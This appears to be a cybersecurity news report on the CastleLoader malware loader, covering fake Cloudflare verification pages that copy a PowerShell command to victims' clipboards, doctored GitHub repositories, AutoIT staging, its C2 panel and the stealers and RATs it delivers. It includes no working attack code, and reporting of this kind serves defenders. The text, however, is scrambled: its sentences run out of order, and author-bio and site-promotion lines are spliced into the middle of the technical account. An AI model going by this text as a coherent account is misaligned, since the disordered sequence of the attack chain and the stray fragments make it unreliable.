CastleLoader, a rapidly evolving loader discovered in 2025, has surged across underground networks by weaponizing Cloudflare-themed “Clickfix” phishing pages and doctored GitHub repositories to compromise Windows hosts. Because tasks are loaded from the server in real time, defenders cannot rely on static indicators, instead, behavioral detection that flags clipboard manipulation followed by outbound PowerShell traffic offers the best chance of early disruption. The malware masquerades as benign developer resources, browser updates, or meeting portals, luring unsuspecting users into copying a seemingly innocent PowerShell command that promises to “verify” or “repair” site access. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Operators upload new binaries to a “Delivery” module and then craft tasks that embed PowerShell inlined into URL parameters, allowing campaign changes without touching the host sites. When a victim loads the fake Cloudflare verification page, embedded JavaScript silently issues /s.php?an=0 to retrieve a Base64-encoded PowerShell payload and copies it to the clipboard via unsecuredCopyToClipboard(). By staging downloads through legitimate-looking domains and legitimate tooling (AutoIT), CastleLoader sidesteps many content filters while leaving minimal disk artefacts. The scope of the threat is significant: between May and July 2025 researchers recorded 1,634 malware-download attempts and 469 confirmed infections—an alarming 28.7% success rate among users who clicked the malicious links. Further persistence is optional but potent: the C2 can instruct hijacked hosts to create scheduled tasks, inject DLLs into trusted processes, or repeatedly rerun payloads whenever a user logs on. Catalyst researchers noted that the platform’s web-based C2 panel mirrors a malware-as-a-service dashboard, complete with statistics, geographic filters, and one-click redeployment to already compromised systems. Once executed, that single line silently pulls CastleLoader onto the machine, opening the door to information-stealers such as StealC and RedLine as well as remote-access trojans like NetSupport RAT and SectopRAT. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. In every observed wave, CastleLoader served as the common delivery hub, dynamically selecting secondary payloads according to each victim’s profile. This script fetches a campaign-specific ZIP, unpacks an AutoIT loader, and executes shellcode that resolves hashed API names before contacting the C2 over HTTPS to fetch a final payload. Catalyst analysts identified at least seven distinct command-and-control (C2) servers coordinating these campaigns, several of which targeted government networks in the United States.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 25 Jul 2025 07:40:16 +0000